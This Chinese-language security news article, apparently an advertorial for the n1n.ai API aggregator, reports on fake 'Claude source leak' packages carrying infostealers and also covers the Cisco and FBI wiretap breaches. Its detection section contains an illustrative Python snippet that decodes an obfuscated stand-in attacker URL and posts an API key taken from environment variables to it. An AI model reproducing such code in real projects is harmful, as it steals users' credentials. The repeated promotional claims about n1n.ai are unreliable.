黑客利用 Claude 源码泄露传播恶意软件

作者
  • avatar
    姓名
    Nino
    职业
    Senior Tech Editor

专有大语言模型(LLM)源代码的诱惑已成为网络罪犯的有力武器。最近几周,安全研究人员发现针对开发者和 AI 爱好者的恶意攻击活动激增,这些活动声称提供 Anthropic 旗下 Claude 模型的“泄露源码”。然而,这些压缩包中不仅包含算法,还捆绑了精密的窃密软件(Infostealers)和远程访问木马(RAT)。这一趋势凸显了 AI 热潮与传统网络间谍活动之间日益增长的交集。

Claude “泄露”活动的内幕分析

Claude 系列模型的创造者 Anthropic 一直保持着严密的安全态势,但市场对 Claude 3.5 Sonnet 等高性能模型的高度需求,为社会工程学攻击提供了肥沃的土壤。黑客在各大论坛、GitHub 仓库和 Telegram 频道分发 ZIP 文件,声称这些文件包含 Claude 的内部权重或底层代码库。

当开发者下载并尝试运行这些脚本时,隐藏的恶意软件会在后台执行。目前识别出的大多数样本是 Lumma Stealer 或 RedLine Stealer 的变体。这些程序旨在窃取浏览器 Cookie、保存的密码,以及存储在环境变量中的 API 密钥。对于使用 n1n.ai 等平台访问高性能模型的开发者来说,本地机器的失陷可能导致凭据被盗,进而使攻击者能够访问强大的计算资源。

Cisco 与持续的供应链危机

与针对 Claude 的攻击并行,科技行业正受到 Cisco 数据泄露事件的冲击。攻击者成功窃取了源代码和内部文档,这标志着针对软件供应链的威胁者再次取得胜利。供应链攻击的破坏性极强,因为它们破坏了其他公司所依赖的工具和基础设施。

当源代码被盗时,黑客可以在受控的离线环境中寻找零日漏洞(Zero-day vulnerabilities)。这使得未来针对 Cisco 硬件和软件用户的攻击更有可能成功。对于企业而言,这强化了使用托管网关的必要性。通过像 n1n.ai 这样的安全聚合器路由 AI 请求,开发者可以在内部基础设施和外部模型提供商之间增加一个抽象层,从而缩小潜在凭据泄露的影响范围。

FBI 窃听工具被黑:国家安全警示

美国联邦调查局(FBI)最近就其窃听工具遭黑客攻击发出严厉警告,该攻击被归因于国家级背景的黑客组织(通常与 “Salt Typhoon” 有关)。攻击者获得了美国政府用于执行法院授权监控的系统的访问权限。这次入侵被描述为“国家安全风险”,因为它可能允许对手了解政府正在监视谁以及监控是如何进行的。

这一事件凸显了一个残酷的现实:即使是最安全的政府系统也存在漏洞。对于私营部门来说,教训很明确——安全不是一种静态的状态,而是一个持续的缓解过程。无论你是在构建 AI 驱动的应用,还是管理联邦数据,API 管理的完整性都至关重要。

技术深挖:如何识别“泄露”库中的恶意代码

对于禁不住诱惑想要探索“泄露”仓库的开发者,以下是这些恶意 Claude 包中常见的危险信号:

  1. 混淆的 Python 脚本:寻找 base64 编码的字符串或 exec() 调用,这些通常用于隐藏代码的真实意图。
  2. 异常的网络请求:使用 Wireshark 等工具监控脚本是否尝试连接到未知的 C2(命令与控制)服务器。
  3. 依赖项混淆:检查 requirements.txt 文件,看是否存在名称与合法库非常相似但有细微差别的包(Typosquatting)。

以下是一个恶意脚本尝试窃取环境变量的简单示例:

import os
import requests
import base64

# 伪造的 Claude 初始化函数
def init_model():
    # 经过混淆的攻击者服务器 URL
    c2_url = base64.b64decode("aHR0cHM6Ly9tYWxpY2lvdXMtY29sbGVjdG9yLmV4YW1wbGUvcmVjZWl2ZQ==").decode()

    # 窃取敏感 API 密钥
    keys = {
        "api_key": os.getenv("LLM_API_KEY"),
        "user": os.getlogin()
    }

    try:
        # 尝试将密钥发送到远程服务器
        requests.post(c2_url, json=keys, timeout=2)
    except:
        pass

print("Claude Model Initialized...")

为了规避这些风险,开发者应始终使用官方 SDK 和信誉良好的 API 聚合器。n1n.ai 提供了一个安全、统一的界面来访问世界顶尖的 LLM,无需承担未经核实的本地代码所带来的风险。

对比分析:官方 API vs. “泄露”的本地模型

特性官方 API (通过 n1n.ai)“泄露”的本地源码
安全性高(加密、托管)极低(极高恶意软件风险)
性能延迟保证 < 200ms取决于本地硬件
可靠性99.9% 可用性不稳定 / 无法运行
更新实时更新 (Claude 3.5, GPT-4o)仅限过时版本
合规性符合 SOC2 / GDPR 标准不合规

开发者安全建议 (Pro Tips)

  1. 环境隔离:始终在 Docker 容器或专用的虚拟机(VM)中运行实验性的 AI 代码,切断其与主文件系统的访问权限。
  2. 密钥管理:切勿在代码中以明文形式存储 API 密钥。使用密钥管理器或保险箱(Vault)。
  3. 验证哈希值:如果你在下载合法的开源模型(如 Llama 3),务必验证官方仓库提供的 SHA-256 哈希值。
  4. 利用受信任的网关:对于生产环境,利用 n1n.ai 在边缘侧处理速率限制、日志记录和安全过滤。

总结

“Claude 源码泄露”是黑客利用技术好奇心攻击开发者社区的经典案例。随着 AI 继续主导科技版图,源代码和 API 凭据的价值只会越来越高。通过保持警惕并利用 n1n.ai 等安全平台,您可以保护您的知识产权和基础设施免受这些演变中威胁的侵害。

立即在 n1n.ai 获取免费 API 密钥。

参考来源:https://www.wired.com/story/security-news-this-week-hackers-are-posting-the-claude-code-leak-with-bonus-malware/